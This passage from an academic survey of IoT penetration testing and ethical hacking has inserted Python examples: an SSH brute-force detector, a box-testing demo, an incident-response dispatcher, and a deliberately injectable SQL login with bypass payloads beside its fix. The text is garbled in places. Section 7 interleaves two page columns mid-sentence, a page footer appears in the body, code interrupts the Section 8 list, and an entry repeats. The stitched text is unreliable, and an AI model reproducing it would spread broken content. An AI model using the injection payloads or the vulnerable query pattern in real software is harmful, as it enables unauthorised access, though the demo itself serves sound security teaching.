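Mar 12 10:00:07 iot-gw sshd[812]: Failed password for pi from 203.0.113.7 port 51242 ssh2
Mar 12 10:00:09 iot-gw sshd[812]: Accepted password for pi from 203.0.113.7 port 51244 ssh2
Mar 12 10:15:00 iot-gw sshd[901]: Failed password for alice from 198.51.100.20 port 40001 ssh2
Mar 12 10:15:30 iot-gw sshd[901]: Accepted password for alice from 198.51.100.20 port 40002 ssh2
Mar 12 10:16:00 iot-gw CRON[950]: pam_unix(cron:session): session opened for user root
"""

# OpenSSH-style authentication messages (assumed format for the demo).
AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_auth_line(line, year):
    """Return a dict for an sshd auth line, or None for lines of no interest."""
    m = AUTH_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=1),
                      min_streak=3, year=2024):
    """Flag source IPs with >= threshold failures inside any `window`, and any
    success that directly follows >= min_streak failures from the same IP."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_auth_line(line, year)
        if ev:
            by_ip[ev["ip"]].append(ev)

    findings = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        fails = [e["ts"] for e in events if e["result"] == "Failed"]
        # Sliding window over failure timestamps: report the first window that trips.
        for i, start in enumerate(fails):
            j = i
            while j < len(fails) and fails[j] - start <= window:
                j += 1
            if j - i >= threshold:
                findings.append({"type": "bruteforce", "ip": ip,
                                 "failures": j - i, "start": start})
                break
        # A success right after a run of failures usually means a guessed credential.
        streak = 0
        for e in events:
            if e["result"] == "Failed":
                streak += 1
                continue
            if streak >= min_streak:
                findings.append({"type": "success_after_failures", "ip": ip,
                                 "user": e["user"], "failures": streak, "at": e["ts"]})
            streak = 0
    return findings


if __name__ == "__main__":
    for finding in detect_bruteforce(SAMPLE_LOG):
        print(finding)
```

On the constructed log this reports two findings for 203.0.113.7 (five failures within six seconds, then a successful login for `pi` after that run) and nothing for 198.51.100.20, whose single failure followed by a success is ordinary user behaviour. The second check matters more than the first: a guessing tool that stays under the rate threshold still produces a failure run ending in a success.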
6. Penetration testing

Penetration testing requires the presence of ethical hackers working in a certified/verified professional manner that guarantees their safety as well as the organisation's safety and security in any IoT domain. Therefore, it is highly important to know how penetration testing is linked to ethical hackers, and how ethical hackers perform their duties and tasks. Penetration tests are conducted to evaluate the levels of IoT security and the immunity of given IT and non-IT systems and personnel against security gaps and/or exploitable vulnerabilities [297] from already known or unknown attacks. A vulnerability can exist in an OS due to a design flaw, mis-configuration, software bug or even a failure. Therefore, the aim of penetration testing is to safeguard information from any alteration, modification or disclosure by already known threats and/or attacks. As such, different security measures were suggested and presented by different papers, including [298,299]. Such papers presented the implementation of the right access control mechanisms along with a strong authentication process, accompanied by additional firewalls, Intrusion Detection/Intrusion Prevention Systems, and cryptographic mechanisms to protect data Confidentiality, Integrity and Availability (CIA), as well as privacy and authentication.

Penetration testing has its own advantages and drawbacks that one must understand before diving deeper into this subject, especially when it is applied to the IoT domain. The main advantage of penetration testing lies in ensuring the right evaluations through the tests so as to achieve a proactive security approach [297]. Such an approach allows the accurate exploration and detection of security risks, whilst ensuring a system's adaptation to real-time changes. Moreover, penetration testing helps with the investigation of data breaches and network intrusions. As a result, advanced penetration testing was introduced in Ref. [300], based on the latest available security exploitation and research. Unlike traditional penetration testing, the organisation is made aware of the importance of relying on a solid, well-built incident response team and programme to address any emerging threat before it even occurs [301].

6.1. Penetration testing tools

To ensure the most effective and successful penetration testing for IoT, different tools are used for this specific task; many in-use tools were presented in Ref. [258], with a brief comparison between vulnerability assessment and penetration testing being made in Ref. [302]. The main penetration testing tools are highlighted and summarised in Table 9.

Table 9
Famous penetration testing tools that can be used on IoT devices, servers, and user device(s) that have an operating system.

Penetration Testing Tools | Description
Acunetix | Scans and detects web vulnerabilities including XSS, SQL injection, code execution and file inclusion/upload form flaws
Burp Suite | Used for pen-testing and securing websites; capable of proxy interception, writing plugins, and automatic vulnerability detection
BackBox Linux | Focuses on penetration testing and safety assessment; mainly used for the analysis of web applications and networks
Kali Linux | An advanced penetration testing and security auditing distribution, with hundreds of tools for pen-testing, forensics and reverse engineering, and other wireless, web and network security analysis
Nessus | Deals with a large number of network devices; also used for web application penetration testing
Parrot Security OS | Highly efficient lightweight OS designed for ethical hacking, computer forensics testing, cryptography and other security tasks
Samurai Web Testing Framework | Preconfigured framework that functions as a web pen-testing platform, capable of detecting website code vulnerabilities
SQLmap | Automated command-line tool capable of detecting and exploiting SQL injection vulnerabilities whilst extracting information from databases

6.2. Penetration testing knowledge types

Penetration testing knowledge is usually divided into three main types [303]. Each type is classified as part of the conducted penetration test in order to evaluate the level of security and immunity of a given organisation in each tested case [304,305]. Moreover, box testing techniques are presented in Table 10.

• White-Box Testing: also known as open box testing [306]. It is based on having full knowledge of the intended and targeted IoT system, in addition to all its software and firmware components. White-box testing assumes the attacker has an insider (i.e. a whistle-blower) with full knowledge of how a program runs. White-box testing is less time consuming, since there is prior full knowledge of the IoT system, which makes it very suitable for testing algorithms. It also ensures that all logical decisions are verified and that the syntax is checked for any possible design error.
• Grey-Box Testing: also known as translucent testing. It is based on having partial knowledge of the IoT system, since the internal programming is only partially known. It is not especially time consuming [307]. However, it is not suitable for testing algorithms. It is non-intrusive and unbiased, with the least risk of conflicts between testers and developers.
• Black-Box Testing: can also include application black-box testing [308]. Testers do not have any prior knowledge of the internal/external IoT system, nor of the software and firmware structure used [306]. It can also be applied to Android applications [309]. As a result, such a test is conducted from the user's perspective and not the designer's perspective. Even though the program under test is unknown, a pen-tester may still be an expert, since testers rely on any system inconsistencies. This testing form is very time consuming, as there is no prior knowledge of the tested system. It is not useful for testing algorithms or complex segments of code, since many program paths are left untested. It is also known as behavioural testing and can be either functional or non-functional.
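To make the white-box versus black-box distinction concrete, here is an added example (not from the paper) that tests one small, hypothetical IoT command parser both ways: a white-box suite derived from the code, which reaches 100% decision coverage, and a black-box suite derived from the specification alone, using boundary values and one representative per equivalence class. The command grammar, the parser and its deliberate off-by-one defect are assumptions made for the demonstration.

```python
"""Added example (not from the paper): white-box vs black-box tests of a hypothetical
IoT parser for 'SET <channel 0..7> <level 0..100>'. Grammar and defect are assumed."""

MAX_CHANNEL = 7     # valid channels are 0..7 inclusive (the specification)
MAX_LEVEL = 100     # valid levels are 0..100 inclusive

DECISIONS = {}      # decision name -> set of outcomes observed ({True, False})


def decide(name, outcome):
    """Record a decision outcome so that decision coverage (Table 10) can be measured."""
    DECISIONS.setdefault(name, set()).add(bool(outcome))
    return outcome


def parse_set_command(line):
    """Parse 'SET <channel> <level>'; return (channel, level) or None if rejected.
    Deliberate defect for the demonstration: the upper channel bound is exclusive,
    so the last valid channel, 7, is wrongly rejected."""
    parts = line.strip().split()
    if decide("format", len(parts) != 3 or parts[0] != "SET"):
        return None
    try:
        channel, level = int(parts[1]), int(parts[2])
    except ValueError:
        return None
    if decide("channel_range", channel < 0 or channel >= MAX_CHANNEL):  # BUG: should be >
        return None
    if decide("level_range", level < 0 or level > MAX_LEVEL):
        return None
    return (channel, level)


def decision_coverage():
    """Fraction of decisions for which both the True and the False outcome were seen."""
    if not DECISIONS:
        return 0.0
    return sum(len(seen) == 2 for seen in DECISIONS.values()) / len(DECISIONS)


# White-box suite: derived from the code, one input per decision outcome.
WHITE_BOX_SUITE = [
    ("SET 3 50", (3, 50)),    # all three decisions False -> accepted
    ("SET 3", None),          # format        -> True
    ("SET 9 50", None),       # channel_range -> True
    ("SET 3 500", None),      # level_range   -> True
]

# Black-box suite: derived from the specification only, with values on each
# boundary and one representative per equivalence class of invalid input.
BLACK_BOX_SUITE = [
    ("SET 0 0", (0, 0)),        # lower boundaries of both ranges
    ("SET 7 100", (7, 100)),    # upper boundaries of both ranges
    ("SET -1 50", None),        # just below the channel range
    ("SET 8 50", None),         # just above the channel range
    ("SET 3 101", None),        # just above the level range
    ("SET x 50", None),         # non-numeric class
    ("GET 3 50", None),         # wrong verb class
]


def run_suite(suite):
    """Run every case; return the list of (input, expected, actual) mismatches."""
    failures = []
    for line, expected in suite:
        actual = parse_set_command(line)
        if actual != expected:
            failures.append((line, expected, actual))
    return failures


if __name__ == "__main__":
    for name, suite in (("white-box", WHITE_BOX_SUITE), ("black-box", BLACK_BOX_SUITE)):
        DECISIONS.clear()
        failures = run_suite(suite)
        print(f"{name}: {len(failures)} failure(s), decision coverage {decision_coverage():.0%}")
        for failure in failures:
            print("   ", failure)
```

The white-box suite passes with every decision exercised in both directions, yet the black-box suite fails on the upper channel boundary (`SET 7 100`): full decision coverage proves the code was executed, not that it matches the specification, which is why the text presents the two approaches as complementary rather than interchangeable. Decision coverage is measured here by a hand-placed `decide()` hook rather than by a coverage tool such as those named in Table 10.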
Table 10
Existing box testing techniques [306,307].

Testing Type | Testing Technique | Description
White-box testing | Statement coverage | Tests every statement at least once. Tool in use: Cantata++
White-box testing | Decision coverage | Tests every decision condition, including conditional loops, at least once. Tool in use: TCAT-PATH
White-box testing | Condition coverage | Ensures that each condition is evaluated at least once during code execution
White-box testing | Decision/condition coverage | Tests all decision and condition coverage during code execution
White-box testing | Multiple condition coverage | Each system entry point is executed more than once
Black-box testing | Boundary value analysis | Finds errors at the boundaries of the input values
Black-box testing | Equivalence class partitioning | Reduces redundant application testing: inputs are divided into classes, with representative values for each class
Black-box testing | Decision table based testing | Employed when the action depends on varying combinations of conditions
Black-box testing | Cause-effect graphing technique | Operates on a system's external behaviour only, and helps selecting and creating test cases
Black-box testing | Error guessing | Success rate depends on the experience of the tester; test cases are written while reading a document or when encountering an undocumented error
Grey-box testing | Matrix testing | Defines all the existing variables of a given program
Grey-box testing | Regression testing | Relies on retest-all, retest-risky-use-cases and retest-within-a-firewall strategies to check whether previous changes regressed other aspects of the program's new version
Grey-box testing | Pattern testing | Goes through the code to identify the cause of failure by retrieving historical data of the previously defective system
Grey-box testing | Orthogonal array testing | Offers the most code coverage with the fewest test cases

6.3. Penetration testing application areas

Penetration testing can also be applied to other IoT domains, such as the application and network domains. It is applied to evaluate the levels of security of a given application and network, both internally and externally, to avoid any possible exploitation. In other terms, penetration testing can take the form of application penetration testing, internal/external network penetration testing, and infrastructure/application penetration testing.

• Application Penetration Testing: including mobile and web application pen testing [310], aims to reveal possible application vulnerabilities, security risks, weaknesses and flaws by relying on real-case strategies and attacks. This is done through close cooperation and collaboration between IoT applications and the IT infrastructure (servers, networks and devices alike) to detect and overcome any exploitable vulnerability or security gap. Application and web application penetration testing focuses on reviewing the authorisation, data protection and security configuration mechanisms.
• Internal & External IoT Network Penetration Testing: aims to detect the main IoT network vulnerabilities [311] by conducting a series of simulated attack scenarios using the Kali Linux operating system platform [312]. It tries to identify the exploited vulnerability(ies) and/or security gap(s) along the path of the attack in order to assess their likelihood and impact, thus offering the necessary recommendations to protect a network both internally and externally.
• Cloud Penetration Testing: is applied to the cloud infrastructure domains as part of pen testing in clouds, or cloud pen testing [313], and includes both corporate applications and integrated networks [314]. The aim is to identify any attack path based on an identified security gap, while assessing the likelihood and impact of a similar potential attack type against the IoT in the cloud [315].

6.4. Existing solutions

To ensure a much more accurate and successful penetration testing process, various solutions have been presented, using different techniques and tools to safeguard and maintain a secure IoT environment. Different protective precautions and actions have already been taken into consideration [12] to protect a system from any cyber-attack based on ethical hacking techniques, rather than only training managers [316].

• Ethical Hacking: ethical hacking is an essential method to reproduce the lifecycle adopted by a hacker or an attacker when simulating an attack against an IoT system, application/OS, or network. Therefore, a variety of solutions has been presented. Greenwald et al. developed a methodology that provides automated generation and execution of remote testing plans using modelling techniques from partially observable Markov decision processes (POMDPs) [317]. The authors demonstrated the efficiency of the approximation algorithm used to satisfy the performance requirements of penetration test planning. Trivedi presented a comprehensive online solution for network administrators that uses popular exploits and network intrusion tools on their own private network to detect any breach/flaw and preserve confidential data [318]. As a result, an IDS was presented to prevent cross-site scripting vulnerabilities.

In [319], Lu et al. analysed the Shadowcrew network to examine the social organisation of a hacking community, using social networking methods for text mining and network analysis. Their analysis revealed the hackers' decentralised network structure as well as their organisation's structure. Zhou et al. presented a system that offers ethical hackers computer forensics training to maintain data protection under attack, while also analysing the organisation's security policies and strategies [320], thus offering a proper Analysis System for Computer Forensic Education, Training & Awareness (ASCFETA) plan. However, the system is prone to various limitations, including the accuracy of data limits, which affects the decision-making process. In Ref. [321], Alazab et al. surveyed the existing trends in crime toolkits and offered a case study on the Zeus botnet. A variety of exploit types was presented to predict future attack trends, while stating that security measures such as behavioural analysis or whitelists are necessary as countermeasures. In Ref. [201], Sood et al. analysed the components and techniques used by the SpyEye botnet malware and presented an example and analysis of third-generation botnets. The analysis was a static-behavioural one, to understand SpyEye's characteristics and exploitation techniques. In Ref. [322], Abbasi et al. presented a scalable and generalised framework that identified expert hackers and characterised their specialities by analysing their forum content on social media platforms, using text analytics for key hacker identification and analysis. Results revealed the hackers' interaction network along with the content-based clustering of key actors within the hacking community. Angmo et al. discussed and analysed the use of the Selenium suite in Ref. [323], which combines different automated testing tools and provides testers with various frameworks for different web testing cases. A performance evaluation shows that the Selenium WebDriver is a better tool than the Watir WebDriver.

In [316], Hajdarevic et al. addressed the threat of resource starvation attacks by presenting a simulation-based training scenario that allows trainees to experience the effect of new/old DDoS attack forms and how to initiate a response in a simulated environment. However, accurate results were not offered. Sandhya et al. presented an approach based on the Wireshark packet sniffing tool to allow ethical hackers to reveal system security flaws at the user authentication level and check whether a website is secure or not [324]. The adoption of this approach offered faster vulnerability identification at a higher success rate. In Ref. [325], Tetskyi et al. described a web service design that relied on neural networks to create a decision support tool for web application penetration testing. However, this solution was prone to various setbacks related mainly to its high expertise and flexibility requirements. In Ref. [326], Bailey et al. presented an innovative approach based on an ethical hacking game, the Self-Adaptive Authorisation Framework (SAAF), which is protected by a self-adaptive authorisation infrastructure that allows the observation of the user's activity pre/post-adaptation. Live experiments managed to capture a wide range of malicious behaviour related to exploiting vulnerabilities, in an effective and efficient manner and without any administrator interference.

• Penetration Testing: penetration testing is an essential method to reveal how a system or network is vulnerable, or how the adopted security measures suffer from an exploitable security gap. As a result, various solutions were presented. Rushing et al. described a software project named Collaborative Penetration-testing and Analysis Toolkit (CPAT), which helps network security analysts perform penetration tests using network analysis technologies and tools in a collaborative environment with reactive data management [327]. However, results are still to be reported. Visoottiviseth et al. developed PENTOS, a penetration testing system for IoT devices designed for ethical hacking and used to determine both IoT risks and vulnerabilities [328]. PENTOS offers penetration testing of IoT devices, including password, web, and wireless attacks, followed by a summary of the attack results together with security recommendations.

Ning et al. presented a penetration attack tree model that describes, organises, classifies, manages, and schedules the attacks for an Attack Resistance Test (ART) [329]. Results show how this model offers a detailed description of the logical relationship between attacks while providing guidance for penetration attacks. Almubairik et al. presented a systematic penetration testing algorithm guided by a threat model, to ensure that all threat models are checked [330]. Applying this model to a real system reduced the consequences that can result from malicious attacks, and did so in a shorter time, since the tester is relieved from monotonous tasks. However, further research is required to cover other threats such as SQL threats, cross-site scripting, and mail threats.

Bechtsoudis et al. revealed how a comprehensive security level can be reached through extensive penetration tests (ethical hacking) [331]. A penetration test methodology and framework were presented to expose any exploitable vulnerability per network layer. Results show how a common network mis-configuration was exploited to compromise the internal network. This provided evidence of why regular penetration tests must be conducted on the organisation's network. Jiajia offered a penetration testing method for the mobile internet that uses the actual network to build a platform for executing a pen test plan based on the existing vulnerabilities of the mobile internet [332]. Results show that the mobile communication terminal is mostly affected by the web pressure test and by energy consumption. In Ref. [333], a company specialised in mobile penetration testing, Attify, started giving courses, writing books and conducting live penetration testing on different IoT domains to offer a more secure use of mobile devices.

Lastly, Hu et al. presented an automated penetration testing framework that employs deep reinforcement learning based on the Deep Q-Learning Network (DQN) method to help automate the penetration testing process. This framework can also be used for defence training by recreating simulated attacks in the training environment [334]. Results show that DQN's accuracy in finding the optimal attack path is 86%.

• Vulnerability Assessment: VA solutions are presented to assess and evaluate the threats related to IoT websites, networks, OS/applications, and devices through simulated attacks, in order to prevent their exploitation. As a result, various VAPT tools are presented. Shah et al. worked on developing NetNirikshak 1.0 as a new automated Vulnerability Assessment and Penetration Testing (VAPT) tool to address the threats that target data/services' Integrity and Confidentiality [335]. NetNirikshak 1.0 was reportedly useful against SQL injection (SQLi) vulnerabilities while tracing back the source of the attack. However, NetNirikshak 1.0 is limited to SQLi and cannot detect Cross Site Scripting (XSS), OS Command Injection, etc.

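As an added example of the SQL injection class that NetNirikshak 1.0, SQLmap and Acunetix (Table 9) detect (example code written for this page, not from any of those tools): a login query built by string formatting beside its parameterised fix, and a boolean-based probe of the kind a VAPT scanner runs against both. The SQLite schema, the rows and the payloads are constructed for the demo.

```python
"""Added example (not from the paper): SQL injection in a login check, the fix,
and a boolean-based probe. Schema, rows and payloads are constructed."""
import sqlite3


def make_db():
    """Constructed user table for an imaginary IoT gateway admin interface.
    Plaintext passwords are used only to keep the injection mechanics visible;
    a real system stores salted password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "S3cret!"), ("operator", "op-pass")])
    return conn


def login_vulnerable(conn, name, password):
    """Query built by string formatting: attacker-controlled text becomes SQL."""
    query = (f"SELECT name FROM users WHERE name = '{name}' "
             f"AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_hardened(conn, name, password):
    """Same check with bound parameters: the input is data, never SQL syntax."""
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    row = conn.execute(query, (name, password)).fetchone()
    return row[0] if row else None


# Classic payloads: comment out the password check, or make the predicate a tautology.
INJECTION_PAYLOADS = [
    ("admin' --", "anything"),      # '--' starts an SQL comment in SQLite
    ("nobody", "' OR '1'='1"),      # ... AND password = '' OR '1'='1'
]


def probe_injection(conn, login):
    """Boolean-based probe: report payloads that log in without a valid credential."""
    return [(n, p) for n, p in INJECTION_PAYLOADS if login(conn, n, p) is not None]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe_injection(db, login_vulnerable))
    print("hardened:  ", probe_injection(db, login_hardened))
```

Against `login_vulnerable` both payloads return a user name (the first by truncating the statement, the second because `AND` binds tighter than `OR`, so the tautology covers the whole predicate), while `login_hardened` rejects both and still accepts the genuine credential. A real scanner extends the same probe with error-based and time-based variants and with the other injection classes NetNirikshak 1.0 lacks, such as XSS and OS command injection.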
Goel et al. explained how the VAPT concept can be used as an effective cyber defence technology, offering further details about VAPT's life cycle and techniques, along with the top 15 vulnerability assessment tools [257]. The authors also presented an ensemble approach, the "VEnsemble 1.0" model, which combines multiple VAPT tools (open source/premium) to achieve a higher accuracy than previous solutions [336]. Simulations show how VEnsemble 1.0 offers higher accuracy in detecting different types of vulnerabilities at a reduced cost.

The above solutions are summarised in Table 11.

7. IoT Security & Safety Procedures lished [337]. It consists of 13 high-level recommendations to
establish 35 recommendations, 68 provisions, 33 mandatory re-
Despite the different preventive and protective IoT security measures quirements. This standard serves as a guidance tool for IoT manu-
being recommended, many steps need to be considered to ensure that the facturers as it also offers examples of how each provision’s
adopted security and safety measures are both enforced and properly implementation can be provided [338]. A test specification was
introduced into the IoT domain. As a result, (first) incident responders also released by the European Telecommunications Standards
must be distinguished and classified to maintain the right response Institute (ETSI) named ETSI TS 103 701, to describe in a compre-
against a given event(s). Once achieved, preventive and protective se- hensive way how conformity assessment can be achieved, to
curity measures must be employed for further protection. Finally, these harmonize the evaluation methodologies and support manufac-
security measures must be employed to maintain and ensure the right turers, suppliers for their internal security processes [339].
level of protection, while respecting the main security goals.

• NISTIR 8259: provides guidance for both manufacturers and their supporting third parties to design, test and support IoT devices. The series consists of three final documents and one draft document [340].
• NISTIR 8259: includes recommendations for IoT device manufacturers.
• NISTIR 8259A: includes the IoT core device cyber-security technical capability baseline [341].
• NISTIR 8259B: includes the IoT non-technical supporting capability core baseline [341].
• NISTIR 8259C (DRAFT): creates a profile using the IoT Core and Non-Technical Baselines (NISTIR 8259A/B) to create tailored IoT cyber-security requirements sets [342].

Table 11
Existing solutions of Penetration Testing that can be applied to IoT.

| Year | Reference | Authors | Solution | Details |
|---|---|---|---|---|
| 2008 | [329] | Ning et al. | Penetration testing Solutions | List and description of existing PT solutions |
| 2010 | [318] | Trivedi et al. | Comprehensive online tool [WR-3] | Analyses any network security flaw |
| 2012 | [320] | Zhou et al. | ASCFETA | Part of an Organisation's security policy |
| 2013 | [321] | Alazab et al. | Crime tool kit investigation | Study of malware type, variation & quality |
| 2014 | [335] | Shah et al. | "Net-Nirikshak 1.0" model | Facilitates VAPT in Indian banks |
| 2014 | [322] | Abbasi et al. | Social media analytical model | Extracts interactions between users & hacking communities |
| 2015 | [327] | Rushing et al. | CPAT | Suitable for penetration testing data reconnaissance phase |
| 2016 | [336] | Goel et al. | "VEnsemble 1.0" approach | A VAPT that detects different vulnerability types |
| 2016 | [330] | Almubairik et al. | Threat model driven approach | Evaluates the immunity of tested systems against attack types |
| 2017 | [328] | Visoottiviseth et al. | PENTOS | Determines risks/vulnerabilities of IoT devices |
| 2017 | [324] | Sandhya et al. | Use of Wireshark | Assesses website security |
| 2018 | [325] | Tetskyi et al. | Neural Network based penetration testing | Creates decision support tool for Web application |
| 2018 | [326] | Bailey et al. | Ethical game of hacking | Handles malicious behaviour of real & intelligent users |

7.2. Incident response

In case of an incident, a response is automatically triggered, where responders are called upon the occurrence of a security event for them to respond with the right security measures and countermeasures to mitigate any attack that targets the IoT domain in a real-time manner and to reduce the risk's occurrence and likelihood. Such responses can either be active, passive, or hybrid. This depends on the responders' training, skills, experience, available resources, and manpower, as well as on the attacker's motives and gains. As such, they can be classed as active (i.e. the ability to "counter-back" any given attack against an IoT system [343]), passive (i.e. taking defensive counter-measures to overcome it) or hybrid (i.e. using a "Smart Response" built on smart AI-based security measures). Preventive and protective security measures can be adopted to protect the IoT's network, system and users' data [344], such as the use of symmetric encryption [345,346], including post-quantum cryptography [347,348].

8. Learnt lessons

After conducting this survey, the main weak and strong points of penetration testing for IoT are identified, along with those found in the ethical hacking domain.
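The automatically triggered response of Section 7.2 and the "Real-time isolation" recommendation of Section 10, as an added example that is not code from the paper: a small Python incident-response dispatcher that scores each detector alert, quarantines the affected device through a constructed network-controller stand-in, and in hybrid mode escalates high-risk cases to a human responder. The device IDs, event severities, thresholds and controller API are assumptions made for the example.

```python
"""Automated IoT incident response: detect, score, isolate, escalate.

Added example, not code from the paper. It models the passive and hybrid
response classes of Section 7.2 and the "Real-time isolation" recommendation
of Section 10: a security event triggers a response automatically and a device
judged compromised is cut off from the network so it cannot spread further.
Device IDs, event severities, thresholds and the controller stand-in are all
constructed for this example.
"""
from dataclasses import dataclass, field
from enum import Enum
from typing import Dict, List


class ResponseMode(Enum):
    PASSIVE = "passive"  # defensive countermeasures only (block/isolate)
    HYBRID = "hybrid"    # isolate, then escalate high-risk cases to a responder


@dataclass
class Alert:
    device_id: str
    event: str         # detector label, e.g. "c2_beacon"
    confidence: float  # detector confidence in [0, 1]


@dataclass
class Device:
    device_id: str
    segment: str       # network segment / VLAN the device lives on
    isolated: bool = False


class NetworkController:
    """Constructed stand-in for a NAC/SDN controller API: it records the deny
    rules it would push instead of talking to real equipment."""

    def __init__(self) -> None:
        self.rules: List[str] = []

    def quarantine(self, device: Device) -> str:
        rule = f"deny any from {device.device_id} on {device.segment}"
        self.rules.append(rule)
        device.isolated = True
        return rule


# Constructed severity weights for the detector's event labels.
EVENT_SEVERITY: Dict[str, float] = {"port_scan": 0.4, "firmware_tamper": 0.8, "c2_beacon": 0.9}


@dataclass
class IncidentResponder:
    controller: NetworkController
    inventory: Dict[str, Device]
    mode: ResponseMode = ResponseMode.HYBRID
    isolate_threshold: float = 0.5   # at/above: cut the device off
    escalate_threshold: float = 0.7  # at/above (hybrid only): page a responder
    audit: List[str] = field(default_factory=list)

    def risk(self, alert: Alert) -> float:
        """Risk score = detector confidence weighted by event severity."""
        return alert.confidence * EVENT_SEVERITY.get(alert.event, 0.5)

    def handle(self, alert: Alert) -> str:
        """Apply the response policy to one alert and return the action taken."""
        device = self.inventory.get(alert.device_id)
        if device is None:
            # An unknown asset on the IoT network is itself worth a human look.
            self.audit.append(f"{alert.device_id}: unknown device, escalated")
            return "escalate"
        score = self.risk(alert)
        if score < self.isolate_threshold:
            self.audit.append(f"{device.device_id}: {alert.event} risk={score:.2f} logged")
            return "log"
        if not device.isolated:
            # Real-time isolation: push the deny rule once, never twice.
            self.controller.quarantine(device)
        action = "isolate"
        if self.mode is ResponseMode.HYBRID and score >= self.escalate_threshold:
            action = "isolate+escalate"
        self.audit.append(f"{device.device_id}: {alert.event} risk={score:.2f} {action}")
        return action


def run_demo(mode: ResponseMode = ResponseMode.HYBRID) -> List[str]:
    """Replay a constructed alert stream and return the actions taken."""
    controller = NetworkController()
    inventory = {"cam-01": Device("cam-01", "vlan-iot-cameras"),
                 "plc-07": Device("plc-07", "vlan-ot-floor2")}
    responder = IncidentResponder(controller, inventory, mode=mode)
    alerts = [
        Alert("cam-01", "port_scan", 0.9),        # risk 0.36: log only
        Alert("plc-07", "firmware_tamper", 0.8),  # risk 0.64: isolate
        Alert("plc-07", "c2_beacon", 0.9),        # risk 0.81: already isolated, escalate
        Alert("bulb-99", "c2_beacon", 0.5),       # not in inventory: escalate
    ]
    return [responder.handle(a) for a in alerts]
```

In passive mode the same stream never escalates: the device is still cut off, but no responder is paged.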
300
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308
• Standard Security Solutions: are required, but more specialised security (counter) measures should be applied instead, as vulnerabilities differ from one IoT device, system, or protocol to another. This is due to the heterogeneous nature of IoT devices, protocols, operating systems, etc., making them more prone to a larger variety of different and dangerous vulnerability types and exploitable security gaps.
• Continuous Security/Awareness Training: which is recommended while adopting specialised security guidelines, especially accountability, depending on the IoT layers, systems, devices, etc., as well as the adoption of seminars and training sessions to keep the users posted and updated.
• Enhanced Security Designs: which are essential ahead of their implementation and adoption using ethical hacking and penetration testing tools for IoT, which can be built on Artificial Intelligence (AI) and Machine Learning (ML) solutions to ensure higher accuracy and reduce false negatives and false positives with a lesser response time to react and interact.
• More Investment: is needed in this domain, which requires a higher budget to be spent to raise awareness, train uniform/non-uniform personnel, assert both responsibility and accountability, as well as to train more ethical hackers and penetration testers to specialise and improve their knowledge, experience, skills and available tools.
• Legal Authorisation: laws must protect and support ethical hackers during their simulated attacks, where pre- and post-agreements need to be established first, to legally maintain their safety and security.
• Forensics Knowledge: more forensics knowledge and expertise is also required to conduct much more effective and efficient penetration testing.

9. Future research directions

Securing IoT systems has undergone great progress in the last few years, but several challenges still lurk ahead, which may be tackled in the next few years and decades. Security, safety, and privacy still pose a serious challenge since a given attacker (i.e. hacker) can maliciously exploit IoT end devices, which in turn can lead to complete or partial control of other IoT end devices, servers, or whole systems. Therefore, we present several potential research directions in the following to improve PT for IoT systems:

• Enable AI-based Solutions: especially since AI plays a key role in enabling innovative penetration testing and ethical hacking solutions. This is due to the ability to react to any discovered security vulnerabilities in one of the following ways:
1. Detect: AI-based solutions can detect IoT-based security gaps and vulnerabilities with higher accuracy, in less time, and with fewer false positives and false negatives.
2. Prevent: AI-based solutions can ensure a much more effective solution at mitigating threats and preventing IoT-based attacks at a faster rate, more effectively, and more accurately.
3. Correct: AI-based solutions can also offer a corrective process similar to the "self-healing" concept, especially for hybrid [349] and distributed [350] IoT systems and applications [351], more accurately and with lesser execution time, fault tolerance and error rates.
4. Mixed: AI-based solutions are usually adopted when the process requires either "Detection and Prevention" or "Detection and Correction" tasks or both, depending on the incident's occurrence or type (i.e. attack or accident).

Sometimes, the detection process cannot be achieved, especially in the case of advanced passive attack types (i.e. Footprinting, War driving, or Spying) [352,353]. Hence, there is an urgent and persistent need for more sophisticated tools to detect attacks in their early phase to prevent them from further spreading and damaging the IoT system, network, application, or device.

• Enable smart automated PT Solutions: which should be enabled in a real-time manner to achieve the necessary functionalities of IoT entities and application requirements. This can be achieved by relying on AI-based solutions, which play a key role in detecting security vulnerabilities.
• Enhanced IoT Corrective Solutions: must be maintained to "correct" and overcome detected IoT security vulnerabilities. This includes enhanced Intrusion Prevention Systems and next-generation firewalls, while ensuring a secure and verified data backup, with alternative devices being available for necessary computational requirements.

On the other hand, existing PT detection solutions (network or host) or correction ones can benefit from the advancements of AI to enhance the PT accuracy level.

10. Suggestions & recommendations

Despite having different IoT security measures available for implementation and deployment, in this paper we present several suggestions and recommendations to support the ethical hacking domain and to enhance penetration testing for IoT systems. Also, we propose the following "Personnel and User Security Awareness Training (PaUSAT)" (see Fig. 9), assigned to each working staff depending on their job nature in a given enterprise or organisation, to establish and achieve both compliance and accountability.

• Maintaining Privacy: and respecting it, especially that of both IoT users and companies, during the conduction of ethical hacking and penetration testing processes, to ensure that it is protected during the whole process.
• Multi-Factor Authentication: must be adopted to prevent any unauthorised access or abused legal access to IoT systems or devices that transmit, receive, or store sensitive data or information.
• Lightweight Security Mechanisms: such as lightweight encryption and lightweight intrusion detection systems can be applied to resource-constrained IoT devices to ensure that they are also protected against any possible malicious event(s) such as security exploits or attacks, and to ensure a safer transmission of real-time IoT data based on a trade-off between the IoT system's performance and its security and privacy mechanisms.
• Enforced policies: the adoption of identification, authorisation, and authentication policies prevents unauthorised entities/users from accessing IoT systems, which makes them less prone to insider threats and attacks.
